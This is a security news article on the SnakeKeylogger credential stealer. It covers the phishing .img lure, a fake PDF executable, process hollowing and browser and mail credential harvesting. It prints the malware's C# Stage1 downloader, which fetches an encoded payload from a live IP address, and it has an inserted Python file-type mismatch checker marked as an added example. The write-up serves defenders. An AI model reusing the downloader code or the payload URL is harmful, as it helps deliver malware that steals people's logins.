Multistage Info Stealer SnakeKeylogger Attacking Individuals and Businesses to Steal Logins

SnakeKeylogger has emerged as a sophisticated credential-stealing malware, targeting both individuals and organizations with its multi-stage infection chain and stealthy in-memory execution techniques.

This malware is specifically designed to harvest sensitive login credentials while remaining undetected by traditional security measures, making it particularly dangerous in today’s digital landscape.

The initial infection vector is a malicious spam email containing a disk image (.img) file attachment. When opened, this file creates a virtual drive containing an executable that masquerades as a PDF document.


The disguised executable’s icon and name are carefully chosen to resemble important business documents, increasing the likelihood that recipients will open it without suspicion.

What makes SnakeKeylogger particularly concerning is its systematic approach to data harvesting.

The malware targets credentials stored in web browsers, email clients, FTP applications, and even extracts WiFi passwords from infected systems.

Once collected, this sensitive information is exfiltrated to attacker-controlled servers.

Seqrite researchers identified that SnakeKeylogger employs a sophisticated multi-stage infection technique to enhance its stealth capabilities.


Their analysis revealed the malware’s ability to download encrypted payloads and execute them directly in memory, avoiding disk-based detection methods.

The infection chain begins with the Stage1 loader connecting to a remote server to fetch what appears to be an MP3 file but is actually an encoded payload.

Attack Chain (Source – Seqrite)

A key section of the malware's code reveals this deception:

using System;
using System.IO;
using System.Net.Http;

// Stage1 downloader as recovered in the analysis: fetches the supposed MP3
// from the remote server and hands the raw bytes to the next stage, which
// decodes them in memory rather than writing them to disk.
private static byte[] Goakadr()
{
    byte[] array;
    using (HttpClient httpClient = new HttpClient())
    {
        // The .mp3 extension is a disguise; the response body is an encoded payload.
        Stream result = httpClient.GetStreamAsync(new Uri("http://103.72.56.30/PHANTOM/Xawnb.mp3")).Result;
        using (MemoryStream memoryStream = new MemoryStream())
        {
            result.CopyTo(memoryStream);
            array = memoryStream.ToArray();
        }
    }
    return array;
}

This initial payload is then decrypted (Stage2) and injected into legitimate Windows processes through a technique known as process hollowing.

The malware specifically targets InstallUtil.exe, a legitimate .NET Framework utility, hollowing out its memory and replacing it with malicious code. By executing within a trusted Windows process, SnakeKeylogger can more effectively evade security solutions.
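Both deceptions described above (an executable named like a PDF document, and a payload served under an .mp3 name) are the same class of lure: the claimed file type disagrees with the content. The following is an added example, not code from the article or from Seqrite, showing how a defender can check captured file names and the first bytes of their content for such mismatches; the sample records are constructed and the host name is a placeholder.

```python
import os
from typing import Optional

# Constructed sample records (not from the article): (claimed name, first bytes of content).
SAMPLES = [
    ("http://stage1.example.invalid/music/track.mp3", b"ID3\x04\x00\x00\x00\x00\x10\x00"),
    ("http://stage1.example.invalid/PHANTOM/Xawnb.mp3", b"TVqQAAMAAAAEAAAA//8AALgA"),
    ("Quotation_2024.pdf", b"%PDF-1.7\n"),
    ("Quotation_2024.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
]

def looks_like_mp3(head: bytes) -> bool:
    """ID3v2 tag or an MPEG audio frame sync (11 set bits) at offset 0."""
    if head.startswith(b"ID3"):
        return True
    return len(head) >= 2 and head[0] == 0xFF and (head[1] & 0xE0) == 0xE0

def looks_like_pdf(head: bytes) -> bool:
    return head.startswith(b"%PDF-")

def looks_like_pe(head: bytes) -> bool:
    """Windows executables (PE files) start with the DOS 'MZ' signature."""
    return head.startswith(b"MZ")

# What content a file with this extension is expected to start with.
EXPECTED = {".mp3": looks_like_mp3, ".pdf": looks_like_pdf}
DOCUMENT_EXTS = {".pdf"}

def check_record(name: str, head: bytes) -> Optional[str]:
    """Return a finding when the claimed type and the content disagree, else None."""
    base = os.path.basename(name.split("?", 1)[0]).lower()
    stem, ext = os.path.splitext(base)
    inner_ext = os.path.splitext(stem)[1]
    # Disguised executable: a document extension immediately before .exe.
    if ext == ".exe" and inner_ext in DOCUMENT_EXTS:
        return f"{base}: executable disguised as {inner_ext} document"
    expect = EXPECTED.get(ext)
    if expect is None or expect(head):
        return None
    kind = "PE executable" if looks_like_pe(head) else "unrecognised (possibly encoded) content"
    return f"{base}: claims {ext} but body is {kind}"

def scan(records):
    """Run check_record over (name, head) pairs and collect the findings."""
    return [f for name, head in records if (f := check_record(name, head))]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The check is deliberately narrow: a real MP3 or PDF passes, while an .mp3 whose body has no audio header (as with the Stage1 download) or a .pdf.exe is flagged for review.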

The injected code then begins systematically harvesting credentials from over 30 different web browsers, email clients like Outlook and Thunderbird, FTP applications like FileZilla, and instant messaging platforms.

List of browser targets (Source – Seqrite)

The above image shows the extensive list of browser targets, including not only major browsers but also regional and less common variants, demonstrating the thoroughness of the attackers’ approach.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.